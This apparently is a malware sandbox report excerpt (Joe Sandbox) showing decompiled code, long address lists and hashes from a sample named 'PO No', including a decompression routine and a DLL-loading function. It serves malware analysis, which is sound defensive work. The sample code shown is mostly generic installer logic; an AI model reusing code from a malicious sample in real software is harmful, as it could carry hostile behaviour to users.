                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                      											L79:
                                                                      											 *(__ebp - 0x14) = __edx;
                                                                      											goto L80;
                                                                      										case 0x1c:
                                                                      											while(1) {
                                                                      												L123:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													break;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__edx =  *(__ebp - 8);
                                                                      												__cl =  *(__eax + __edx);
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                      												 *(__eax + __edx) = __cl;
                                                                      												__eax = __eax + 1;
                                                                      												__edx = 0;
                                                                      												_t414 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t414;
                                                                      												__eax =  *(__ebp - 0x68);
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                      												__eflags =  *(__ebp - 0x30);
                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                      												 *(__ebp - 0x14) = _t414;
                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                      													continue;
                                                                      												} else {
                                                                      													L80:
                                                                      													 *(__ebp - 0x88) = 2;
                                                                      													goto L1;
                                                                      												}
                                                                      											}
                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                      											goto L170;
                                                                      									}
                                                                      								}
                                                                      								L171:
                                                                      								_t535 = _t534 | 0xffffffff;
                                                                      								goto L172;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}













                                                                      0x00000000
                                                                      0x00406dc3
                                                                      0x00406dc3
                                                                      0x00406dc7
                                                                      0x00406df0
                                                                      0x00406dfa
                                                                      0x00406dc9
                                                                      0x00406dd2
                                                                      0x00406ddf
                                                                      0x00406de2
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407177
                                                                      0x0040717b
                                                                      0x0040732a
                                                                      0x00407340
                                                                      0x00407348
                                                                      0x0040734f
                                                                      0x00407351
                                                                      0x00407358
                                                                      0x0040735c
                                                                      0x0040735c
                                                                      0x00407187
                                                                      0x0040718e
                                                                      0x00407196
                                                                      0x00407199
                                                                      0x0040719c
                                                                      0x0040719c
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x00406947
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00000000
                                                                      0x00406958
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406961
                                                                      0x00406964
                                                                      0x00406967
                                                                      0x0040696b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406971
                                                                      0x00406974
                                                                      0x00406976
                                                                      0x00406977
                                                                      0x0040697a
                                                                      0x0040697c
                                                                      0x0040697d
                                                                      0x0040697f
                                                                      0x00406982
                                                                      0x00406987
                                                                      0x0040698c
                                                                      0x00406995
                                                                      0x004069a8
                                                                      0x004069ab
                                                                      0x004069b7
                                                                      0x004069df
                                                                      0x004069e1
                                                                      0x004069ef
                                                                      0x004069ef
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069e6
                                                                      0x004069e7
                                                                      0x004069e7
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069bd
                                                                      0x004069c2
                                                                      0x004069c2
                                                                      0x004069cb
                                                                      0x004069d3
                                                                      0x004069d6
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069f9
                                                                      0x004069f9
                                                                      0x004069fd
                                                                      0x004072a9
                                                                      0x00000000
                                                                      0x004072a9
                                                                      0x00406a06
                                                                      0x00406a16
                                                                      0x00406a19
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1f
                                                                      0x00406a23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a25
                                                                      0x00406a2b
                                                                      0x00406a55
                                                                      0x00406a5b
                                                                      0x00406a62
                                                                      0x00000000
                                                                      0x00406a62
                                                                      0x00406a31
                                                                      0x00406a34
                                                                      0x00406a39
                                                                      0x00406a39
                                                                      0x00406a44
                                                                      0x00406a4c
                                                                      0x00406a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a9a
                                                                      0x00406a9d
                                                                      0x00406aaa
                                                                      0x00406ab2
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a69
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x004072b8
                                                                      0x00000000
                                                                      0x004072b8
                                                                      0x00406a79
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8a
                                                                      0x00406a8d
                                                                      0x00406a92
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406aba
                                                                      0x00406abc
                                                                      0x00406abf
                                                                      0x00406b30
                                                                      0x00406b33
                                                                      0x00406b36
                                                                      0x00406b3d
                                                                      0x00406b47
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00406ac1
                                                                      0x00406ac5
                                                                      0x00406ac8
                                                                      0x00406aca
                                                                      0x00406acd
                                                                      0x00406ad0
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad7
                                                                      0x00406adc
                                                                      0x00406adf
                                                                      0x00406ae2
                                                                      0x00406ae6
                                                                      0x00406aed
                                                                      0x00406af0
                                                                      0x00406af7
                                                                      0x00406afb
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406b07
                                                                      0x00406b0a
                                                                      0x00406b28
                                                                      0x00406b2a
                                                                      0x00000000
                                                                      0x00406b0c
                                                                      0x00406b0c
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1d
                                                                      0x00406b1f
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406d59
                                                                      0x00406d5d
                                                                      0x00406d7b
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d91
                                                                      0x00406d94
                                                                      0x00406d96
                                                                      0x00406d9d
                                                                      0x00406d9e
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00406da6
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dae
                                                                      0x00000000
                                                                      0x00406dae
                                                                      0x00406d5f
                                                                      0x00406d62
                                                                      0x00406d65
                                                                      0x00406d6f
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e06
                                                                      0x00406e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e10
                                                                      0x00406e14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e1a
                                                                      0x00406e1c
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00406e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e77
                                                                      0x00406e7b
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e88
                                                                      0x00406e92
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00406e7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00406eb8
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00406ec1
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ecb
                                                                      0x00406ed0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406db1
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f4
                                                                      0x00407116
                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x00000000
                                                                      0x004071e4
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406eef
                                                                      0x00406ef2
                                                                      0x00406ef5
                                                                      0x00406ef7
                                                                      0x00406ef9
                                                                      0x00406ef9
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f04
                                                                      0x00406f07
                                                                      0x00406f15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071fa
                                                                      0x004071fa
                                                                      0x004071fe
                                                                      0x00407336
                                                                      0x00000000
                                                                      0x00407336
                                                                      0x00407204
                                                                      0x00407207
                                                                      0x0040720a
                                                                      0x0040720e
                                                                      0x00407211
                                                                      0x00407217
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x0040721c
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x00407222
                                                                      0x00407222
                                                                      0x00407226
                                                                      0x00407286
                                                                      0x00407289
                                                                      0x0040728e
                                                                      0x0040728f
                                                                      0x00407291
                                                                      0x00407293
                                                                      0x00407296
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x004071a8
                                                                      0x004071a2
                                                                      0x00407228
                                                                      0x0040722e
                                                                      0x00407231
                                                                      0x00407234
                                                                      0x00407237
                                                                      0x0040723a
                                                                      0x0040723d
                                                                      0x00407240
                                                                      0x00407243
                                                                      0x00407246
                                                                      0x00407249
                                                                      0x00407262
                                                                      0x00407265
                                                                      0x00407268
                                                                      0x0040726b
                                                                      0x0040726f
                                                                      0x00407271
                                                                      0x00407271
                                                                      0x00407272
                                                                      0x00407275
                                                                      0x0040724b
                                                                      0x0040724b
                                                                      0x00407253
                                                                      0x00407258
                                                                      0x0040725a
                                                                      0x0040725d
                                                                      0x0040725d
                                                                      0x00407278
                                                                      0x0040727f
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00000000
                                                                      0x00406e68
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00000000
                                                                      0x00407355
                                                                      0x004071a2
                                                                      0x00407129
                                                                      0x00407126

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                      • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                      • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                      • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0040202C(void* __ebx, void* __eflags) {
                                                                      				struct HINSTANCE__* _t23;
                                                                      				struct HINSTANCE__* _t31;
                                                                      				void* _t32;
                                                                      				void* _t34;
                                                                      				WCHAR* _t37;
                                                                      				intOrPtr* _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t32 = __ebx;
                                                                      				asm("sbb eax, 0x42a318");
                                                                      				 *(_t39 - 4) = 1;
                                                                      				if(__eflags < 0) {
                                                                      					_push(0xffffffe7);
                                                                      					L15:
                                                                      					E00401423();
                                                                      					L16:
                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                      					return 0;
                                                                      				}
                                                                      				_t37 = E00402C37(0xfffffff0);
                                                                      				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
                                                                      				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                      					L3:
                                                                      					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                      					 *(_t39 + 8) = _t23;
                                                                      					if(_t23 == _t32) {
                                                                      						_push(0xfffffff6);
                                                                      						goto L15;
                                                                      					}
                                                                      					L4:
                                                                      					_t38 = E004067F9( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                      					if(_t38 == _t32) {
                                                                      						E00405414(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                      					} else {
                                                                      						 *(_t39 - 4) = _t32;
                                                                      						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                      							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
                                                                      						} else {
                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                      							if( *_t38() != 0) {
                                                                      								 *(_t39 - 4) = 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403A5E( *(_t39 + 8)) != 0) {
                                                                      						FreeLibrary( *(_t39 + 8));
                                                                      					}
                                                                      					goto L16;
                                                                      				}
                                                                      				_t31 = GetModuleHandleW(_t37); // executed
                                                                      				 *(_t39 + 8) = _t31;
                                                                      				if(_t31 != __ebx) {
                                                                      					goto L4;
                                                                      				}
                                                                      				goto L3;
                                                                      			}










                                                                      0x0040202c
                                                                      0x0040202c
                                                                      0x00402031
                                                                      0x00402038
                                                                      0x004020f7
                                                                      0x00402245
                                                                      0x00402245
                                                                      0x00402abf
                                                                      0x00402ac2
                                                                      0x00402ace
                                                                      0x00402ace
                                                                      0x00402047
                                                                      0x00402051
                                                                      0x00402054
                                                                      0x00402064
                                                                      0x00402068
                                                                      0x00402070
                                                                      0x00402073
                                                                      0x004020f0
                                                                      0x00000000
                                                                      0x004020f0
                                                                      0x00402075
                                                                      0x00402080
                                                                      0x00402084
                                                                      0x004020c4
                                                                      0x00402086
                                                                      0x00402089
                                                                      0x0040208c
                                                                      0x004020b8
                                                                      0x0040208e
                                                                      0x00402091
                                                                      0x0040209a
                                                                      0x0040209c
                                                                      0x0040209c
                                                                      0x0040209a
                                                                      0x0040208c
                                                                      0x004020cc
                                                                      0x004020e5
                                                                      0x004020e5
                                                                      0x00000000
                                                                      0x004020cc
                                                                      0x00402057
                                                                      0x0040205f
                                                                      0x00402062
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

